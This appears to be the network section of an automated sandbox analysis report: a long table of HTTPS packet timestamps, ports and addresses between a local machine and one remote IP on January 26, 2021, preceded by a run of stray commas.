,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:31:56.169456005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.190820932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.190928936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.204083920 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.225495100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.230417967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.230457067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.230489969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.230520010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.238967896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.261523008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.261800051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.261861086 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.455630064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.477003098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.606843948 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.606890917 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.606930971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.606942892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.606966019 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.606971025 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.606976032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607007980 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607009888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607044935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607054949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607094049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607100964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607136965 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607139111 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607176065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607466936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607508898 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607516050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607553959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.607558966 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.607785940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.608189106 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.608227015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.608241081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.608258963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.629709005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.630661964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.630690098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.630722046 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.630736113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.675189972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675234079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675272942 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675299883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675421000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.675453901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675493002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675523043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.675529003 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.675559044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.675595045 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.675982952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676024914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676055908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.676063061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676085949 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.676120043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.676805973 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676846981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676871061 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.676896095 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.676908016 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.676970005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.677544117 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.677583933 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.677623034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.677629948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.677658081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.677691936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.678010941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.678253889 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.678297043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.678333998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.678344011 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.678370953 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.678400993 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.678982019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.679023981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.679059029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.679063082 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.679086924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.679131985 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.679848909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.679913998 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.685857058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.685889006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.685924053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.685946941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.685961008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.685964108 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.686037064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.723650932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723696947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723746061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723776102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723865032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723879099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.723901033 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.723905087 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723932981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.723936081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.723973036 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.724004984 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.724503040 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.724545956 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.724580050 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.724582911 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.724610090 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.724641085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.725250959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.725292921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.725315094 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.725332022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.725347042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.725395918 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.725945950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.725987911 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.726018906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726026058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.726047039 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726083994 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726449013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726646900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.726706028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.726718903 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726748943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.726763964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.726797104 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.727410078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.727449894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.727474928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.727488041 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.727504015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.727540970 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.728193998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.728236914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.728255987 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.728275061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.728292942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.728331089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.728914022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.728955984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.728971958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.728993893 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.729012966 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.729047060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.729698896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.729747057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.729773998 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.729789972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.729803085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.729840040 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.730396032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.730433941 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.730454922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.730473995 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.730488062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.730520010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731126070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.731168032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.731189966 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731204987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.731218100 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731251955 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731899023 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731919050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.731961012 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.731982946 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.731997967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.732014894 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.732050896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.732666969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.732707024 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.732713938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.732748032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.733350992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.733371973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.749083996 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.749133110 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.749175072 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.749176025 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.749195099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.749207973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.749397993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.749445915 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.749460936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.749485970 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.784286976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784348011 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784378052 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784401894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784435034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784473896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784512043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.784611940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.784651041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.785341024 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.785379887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.785428047 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.785455942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.785461903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.785520077 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.785995960 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786040068 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786056042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.786088943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786101103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.786130905 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.786745071 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786794901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786820889 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.786834002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.786854982 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.786885023 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.787473917 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.787518978 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.787558079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.787559986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.787590981 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.787636042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.787642002 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.788218021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.788263083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.788295031 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.788300037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.788325071 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.788361073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.788978100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789019108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789055109 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.789057016 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789086103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.789117098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.789735079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789773941 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789813042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.789820910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.789850950 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.789886951 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.790502071 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.790541887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.790579081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.790580988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.790613890 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.790648937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.791251898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.791291952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.791330099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.791338921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.791358948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.791394949 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.792043924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792088032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792124987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792157888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.792186022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.792692900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792735100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792773962 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.792789936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.792838097 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.792859077 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.793477058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.793510914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.793541908 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.793566942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.793591022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.793627977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.793900967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.794193029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.794229031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.794261932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.794270992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.794298887 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.794333935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.794971943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.795017004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.795049906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.795052052 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.795078039 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.795114994 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.795567989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.795588017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.805840969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.805871010 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.805887938 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.805941105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.805958986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.806159973 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.806185961 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.806200981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.806200981 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.806219101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.806241035 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840012074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840037107 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840049982 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840060949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840177059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840178013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840195894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840214014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840219021 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840231895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840234995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840249062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840255022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840265989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.840269089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840286016 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840301991 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.840460062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.841197014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.841214895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:56.841248989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.841262102 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:56.843791962 CET	443	49167	172.67.150.228	192.168.2.22
